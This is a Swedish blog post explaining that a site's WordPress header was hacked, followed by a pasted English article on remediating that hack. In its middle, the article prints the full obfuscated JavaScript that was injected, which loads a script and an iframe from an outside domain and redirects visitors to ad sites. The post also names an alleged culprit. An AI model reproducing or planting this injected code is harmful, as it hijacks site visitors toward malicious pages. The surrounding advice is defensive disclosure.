Är inte så farligt som det låter men några av er har fått upp varningar från era virusprogram när ni besökt sidan vilket har fått mig att börja rota i koden.

Mycket riktigt så hittade jag en väldigt mystisk kod under ’head’ taggen i header.php… Hur har då detta gått till? Tydligen så är detta jobb gjort av nån form av känd rysk hackare vid namn Sergey Ryabov. Det enda som sidan var tänkt att göra var att vidarebefordra trafiken till sidor med reklam. Dock så har det inte riktigt fungerat på Tvillingliv. Antagligen så har detta skett precis innan jag uppdaterade sidan till nyaste versionen och då fungerar inte detta hack.

Nu är hotet borta och jag har även installerat en ”WordPress Firewall” som ska blockera denna typ av attack.

Nu är alla söta läsare säkra igen!
För mer detaljerad information om detta hack och hur man löser det, samt förhindrar det i framtiden, läs här.

Lämnar över ordet till min älskade sambo igen!
Antar att hon kommer fnysa över att jag klottrat på bloggen. 😉

There is a brand new WordPress hack attack making the rounds, that redirects all traffic to your site through itsallbreaksoft.net and paymoneysystem.info, and then on to any number of junk sites full of ads. The intermediate redirect to paymoneysystem.info actually goes through the URL paymoneysystem.info/in.cgi?michaeleknowlton, suggesting that someone using the name Michael Knowlton is going to be benefiting from any monies earned by the advertising. Here’s how it was done, and how to fix it. Fortunately, the immediate fix is very easy.

Here is how it was done – the bad guys either injected the below code into the header.php file (this is found in your /wp-content/themes/{your theme name here}/ directory) – or they simply sucked down your header file, modified it on their end to include the below code, and then overwrote your header.php file with the newly modified one.

This is the code that has been added to your header.php file:

script language=javascript>document.write(unescape(’%3C%73%63%72%69
%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72
%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B
%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75
%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B
%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C
%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72
%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E
%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73
%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F
%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70
%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E’));dF(’%
264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%
264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/
ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%
2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%
2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%
264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou
%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%
264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%
264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%
261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%
263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%
264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/
ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%
2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%
2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%
264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou
%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%
264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%
2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F
%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/
joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%
268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%
261B%264D0tdsjqu%264F1′)

This is gobbeldygook actually resolves to a script that redirects your visitors to itsallbreaksoft.net and on to paymoneysystem.info, through “Michael Knowlton’s” affiliate i.d..

To perform an immediate fix, simply remove the code from your header.php file, and then make sure that your header.php file isn’t writable by anyone other than you.

It turns out that the people behind this seem to be a pretty well-known group from Russia, with the main person being one Sergey Ryabov, who uses the email address director at climbing-games dot com. [Ed. Note: We’d love to talk with Mr. Ryabov, to learn more about his operations and how and why he’s able to pull off this kind of hijinx.]

As to how they were able to do this, it’s not yet clear, but if you are running an old version of WordPress – especially a 2.6x version – be sure to upgrade if at all possible.

We also were recently turned onto a great WordPress firewall plugin that is very small and very easy to install, and you can check out the WordPress Firewall plugin here.